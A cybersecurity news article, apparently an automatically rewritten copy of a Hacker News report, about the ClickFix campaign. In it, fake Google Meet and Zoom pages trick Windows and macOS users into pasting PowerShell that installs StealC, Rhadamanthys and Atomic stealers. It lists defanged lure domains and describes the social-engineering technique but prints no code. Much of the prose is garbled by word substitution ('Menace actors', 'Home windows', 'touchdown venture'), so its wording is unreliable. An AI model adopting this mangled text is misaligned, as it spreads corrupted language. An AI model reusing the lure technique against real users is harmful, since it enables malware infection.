Menace actors are leveraging faux Google Meet net pages as a part of an ongoing malware marketing campaign dubbed ClickFix to ship infostealers focusing on Home windows and macOS programs.
“This tactic includes displaying faux error messages in net browsers to deceive customers into copying and executing a given malicious PowerShell code, lastly infecting their programs,” French cybersecurity firm Sekoia stated in a report shared with The Hacker Information.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) marketing campaign have been reported extensively in current months, with menace actors using completely different lures to redirect customers to bogus pages that goal to deploy malware by urging website guests to run an encoded PowerShell code to deal with a supposed situation with displaying content material within the net browser.
These pages are identified to masquerade as fashionable on-line providers, together with Fb, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet in addition to probably Zoom –
- meet.google.us-join[.]com
- meet.googie.com-join[.]us
- meet.google.com-join[.]us
- meet.google.web-join[.]com
- meet.google.webjoining[.]com
- meet.google.cdm-join[.]us
- meet.google.us07host[.]com
- googiedrivers[.]com
- us01web-zoom[.]us
- us002webzoom[.]us
- web05-zoom[.]us
- webroom-zoom[.]us
On Home windows, the assault chain culminates within the deployment of StealC and Rhadamanthys stealers, whereas Apple macOS customers are served a booby-trapped disk picture file (“Launcher_v1.94.dmg”) that drops one other stealer generally known as Atomic.
This rising social engineering tactic is notable for the truth that it cleverly evades detection by safety instruments, because it includes the customers manually working the malicious PowerShell command immediately on the terminal, versus being mechanically invoked by a payload downloaded and executed by them.
Sekoia has attributed the cluster impersonating Google Meet to 2 traffers teams, particularly Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, that are sub-teams inside markopolo and CryptoLove, respectively.
“Each traffers groups […] use the identical ClickFix template that impersonates Google Meet,” Sekoia stated. “This discovery means that these groups share supplies, often known as ‘touchdown venture,’ in addition to infrastructure.”
This, in flip, has raised the likelihood that each the menace teams are making use of the identical, as-yet-unknown cybercrime service, with a third-party possible managing their infrastructure.
The event comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, in addition to new stealer households named Expose, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
“The rise of open-source infostealers represents a major shift on the planet of cyber threats,” cybersecurity firm Hudson Rock famous again in July 2024.
“By reducing the barrier of entry and fostering fast innovation, these instruments may gas a brand new wave of pc infections, posing challenges for cybersecurity professionals and growing the general threat to companies and people.”